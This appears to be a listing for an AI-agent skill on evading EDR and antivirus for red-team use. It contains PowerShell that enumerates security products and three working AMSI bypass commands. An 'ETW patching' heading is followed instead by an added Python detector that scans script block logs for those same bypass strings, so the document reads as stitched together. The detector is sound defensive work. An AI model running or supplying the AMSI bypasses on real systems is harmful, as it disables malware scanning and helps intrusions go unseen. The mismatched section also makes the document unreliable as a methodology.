
edr-evasion (listed)

EDR/AV evasion methodology for authorized red team operations. Covers process injection, AMSI bypass, ETW patching, LOLBins, reflective loading, and obfuscation techniques for testing endpoint detection coverage.
sunilgentyala/OmniRed · ★ 0 · AI & Automation · score 63
Install: claude install-skill sunilgentyala/OmniRed
# EDR Evasion

## Attack Surface

Endpoint Detection and Response (EDR) products use: kernel callbacks, userland API hooks, ETW (Event Tracing for Windows), behavioral analytics, static signatures, and memory scanning. Each layer is independently bypassable.

## Methodology

### Phase 1 — EDR identification

```powershell
# Identify running EDR agents
Get-Process | Where-Object { $_.Name -match 'sentinel|crowdstrike|defender|carbon|cylance|sophos|symantec|mcafee|trend|bitdefender' }

# Check loaded drivers (kernel-level EDR components)
Get-WmiObject Win32_SystemDriver | Where-Object {$_.Name -match 'csagent|sentinel|cb|windefend'}

# Check userland hooks (EDR hooks ntdll.dll exports)
# Use PE-sieve or moneta to detect hooked functions
```

### Phase 2 — AMSI bypass

```powershell
# Classic: patch AmsiScanBuffer return value (AmsiInitFailed)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

# COM-based bypass
[Runtime.InteropServices.Marshal]::WriteInt32([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiSession','NonPublic,Static').GetValue($null),0x80070057)

# Memory patch (requires SeDebugPrivilege)
$a=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')
$b=$a.GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static')
$c=$b.GetValue($null)
[Runtime.InteropServices.Marshal]::WriteByte($c, 0x258, 0)
```

### Phase 3 — ETW patching
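Detection-side counterpart, added here and not part of the OmniRed skill: a Python scanner that applies the literal AMSI-bypass indicators from Phase 2 (reflection into `AmsiUtils`, the `amsiInitFailed` / `amsiContext` / `amsiSession` fields, `Marshal::WriteByte`/`WriteInt32`) and the vendor-name enumeration from Phase 1 to PowerShell script block log text (Event ID 4104). The function names and the sample script blocks are constructed for this example; a real pipeline would feed in the ScriptBlockText field from the log.

```python
import re
from typing import Dict

# Indicators taken from the Phase 1/2 commands above. Applied after light
# normalisation so 'Amsi'+'Utils' style splitting and backtick escapes do not
# defeat a literal match (stronger obfuscation is out of scope here).
AMSI_BYPASS_PATTERNS = {
    "amsi_utils_reflection": re.compile(
        r"\[Ref\]\.Assembly\.GetType\(['\"]System\.Management\.Automation\.AmsiUtils['\"]\)", re.I),
    "amsi_init_failed_field": re.compile(r"amsiInitFailed", re.I),
    "amsi_context_or_session_field": re.compile(r"GetField\(['\"]amsi(Context|Session)['\"]", re.I),
    "marshal_write": re.compile(r"Marshal\]::Write(Byte|Int32)\(", re.I),
}
EDR_ENUM_PATTERN = re.compile(
    r"Get-(Process|WmiObject).*?(sentinel|crowdstrike|csagent|carbon|cylance|windefend)", re.I)

def normalize(script: str) -> str:
    """Remove backtick escapes and collapse 'a'+'b' string concatenation."""
    text = script.replace("`", "")
    return re.sub(r"['\"]\s*\+\s*['\"]", "", text)

def scan_script_block(script: str) -> Dict[str, object]:
    """Return severity plus the individual indicators matched in one 4104 event."""
    text = normalize(script)
    hits = [name for name, pat in AMSI_BYPASS_PATTERNS.items() if pat.search(text)]
    edr_enum = EDR_ENUM_PATTERN.search(text) is not None
    # Reflection into AmsiUtils combined with a field flip or memory write is the
    # strongest signal; a lone field name may just be a quoted blog excerpt.
    if "amsi_utils_reflection" in hits and (
            "amsi_init_failed_field" in hits or "marshal_write" in hits):
        severity = "high"
    elif hits:
        severity = "medium"
    elif edr_enum:
        severity = "low"      # reconnaissance of installed agents, worth a look
    else:
        severity = "none"
    return {"severity": severity, "amsi_indicators": hits, "edr_enumeration": edr_enum}

# Constructed sample script blocks (not real log data).
SAMPLE_CLASSIC = "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"
SAMPLE_SPLIT = "[Ref].Assembly.GetType('System.Management.Automation.Amsi'+'Utils').GetField('amsiInit'+'Failed','NonPublic,Static').SetValue($null,$true)"
SAMPLE_ENUM = "Get-Process | Where-Object { $_.Name -match 'sentinel|crowdstrike' }"
SAMPLE_BENIGN = "Get-Process | Sort-Object CPU -Descending | Select-Object -First 5"

if __name__ == "__main__":
    for s in (SAMPLE_CLASSIC, SAMPLE_SPLIT, SAMPLE_ENUM, SAMPLE_BENIGN):
        print(scan_script_block(s))
```

Script block logging must be enabled for 4104 events to exist at all, and the matches above are literal indicators of the forms shown in this skill, not a general AMSI-tamper detector.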